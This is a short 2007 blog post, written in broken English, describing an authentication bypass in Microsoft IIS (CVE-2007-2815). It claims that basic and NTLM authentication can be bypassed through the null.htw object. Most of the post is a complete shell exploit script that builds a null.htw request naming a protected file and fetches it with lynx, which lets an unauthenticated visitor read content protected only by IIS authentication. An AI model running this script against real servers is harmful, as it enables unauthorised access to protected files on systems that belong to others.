domingo, diciembre 30, 2007

Microsoft IIS ntlm and basic auth bypass

You can protect your web contents by adding ntfs acls, then you will be secure.
But you can protect your web contents by the Internet Information basic/ntlm autentication, then this will be bypassed with null.htw object.

Both authentications seem be the same, but really the object null.htw let users get any file in web directory, only if it is protected by the filesystem, will be secure.

In the exploit you can see how to use the null.htw object.


#!/bin/sh
#
# NTLM && BASIC AUTH BYPASS :)
#
# sha0[at]badchecksum.net
# Based on my adv: http://www.securityfocus.com/bid/24105/info
# (CVE-2007-2815)

if [ $# != 2 ]
then
printf "USAGE:\t\t$0 \nExample:\t$0 http://www.microsoft.com /en/us/default.aspx\n\n";
exit 0
fi

site=$1
protectedObject=$2
evil=$site'/shao/null.htw?CiWebhitsfile='$protectedObject'&
CiRestriction=b&CiHiliteType=full'
lynx -dump $evil

Is hard to believe.